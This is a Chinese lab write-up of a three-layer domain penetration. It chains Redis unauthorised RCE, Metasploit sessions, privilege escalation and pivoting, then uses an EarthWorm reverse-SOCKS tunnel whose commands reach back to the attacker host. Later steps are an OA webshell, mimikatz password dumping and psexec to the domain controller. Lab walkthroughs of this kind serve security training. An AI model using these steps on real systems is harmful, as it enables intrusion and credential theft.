【实战记录】记一次三层网络环境下的域渗透_网络_连通_网卡

网安教育

培养网络安全人才

技术交流、学习咨询

靶场网络环境拓扑图:

相关说明:

DMZ区域:

给Ubuntu1配置了两个网卡,一个桥接可以对外提供服务;一个连接在VMnet8上连通第二层网络。

第二层网络区域:

给Ubuntu2和Windows7都配置了两个网卡,一个连接在VMnet8上连通第二层网络,一个连接在VMnet14上连通第三层网络。

展开全文

第三次网络区域:

给Windows Server 2012和Windows7都只配置了一个网卡,一个连接在VMnet14上连通第三层网络。

外网Web渗透:

通过Kscan资产收集工具进行扫描

可见开放了nginx服务,ssh服务,redis服务

在测试发送redis是未授权的,利用方式如下:

redis写入Webshell

redis计划任务反弹shell(CentOS)

redis写入ssh公钥

redis主从复制RCE利用

这里选择进行redis主从复制RCE

工具地址:

这样就获得了一个shell

接下来,我们反弹给MSF一个Meterpreter会话

MSF生成linux马,python开启HTTP服务

MSF设置监听,目标Ubuntu1运行马,获得会话

提权:

MSF上传提权辅助脚本

工具地址:

成功获得root权限

MSF再生成一个linux马,去获得root用户的Meterpreter会话

内网渗透(横向移动):

存在两个网卡

MSF进行添加路由

再使用Fscan进行扫描第二块网卡的网段

192.168.52.30有个通达OA、还存在MS17-010

这里使用ew启一个反向socks5

攻击机设置:

1ew_for_Win.exe-srcsocks-l1080 -e1234

DMZ区ubuntu1:

1ew_for_linux64-srssocks-d192 .168.137.49-e1234

配置Proxifier访问攻击机的1080端口来使用内网web服务器上面架设的socks代理服务了

查看通达OA版本:

使用通达OA综合利用工具进行检测

蚁剑进行连接Webshell

内网域内信息收集:

本机信息:

system权限

路由信息:

ipconfig /all 发现也是 52.0/24 93.0/24两个网段

并且存在域whoamianony.org

域控为192.168.93.30

查看域内主机名:当前是pc1

因为可以出网,所以直接执行命令上线了CS

使用mimikatz直接导出了域管和bunny域用户的密码:

所有域用户:

域管:

域控:

直接使用CS自带的端口扫描,用win7的beacon对93段进行探测:

192.168.93.30是域控

然后我们使用smb beacon进行psexec就可以了

这样就打完三层网络渗透

END

文章作者: hacker和小黑

文章链接:

版权声明:著作权归作者所有。如有侵权请联系删除

开源聚合网安训练营

环境搭建

Python

学员专辑

信息收集

CNVD

安全求职

渗透实战

CVE

高薪揭秘

渗透测试工具

网络安全行业

神秘大礼包

基础教程

我们贴心备至

用户答疑

QQ在线客服

加入社群

QQ+微信等着你

我就知道你“在看”

特别声明

本文仅代表作者观点,不代表本站立场,本站仅提供信息存储服务。

分享:

扫一扫在手机阅读、分享本文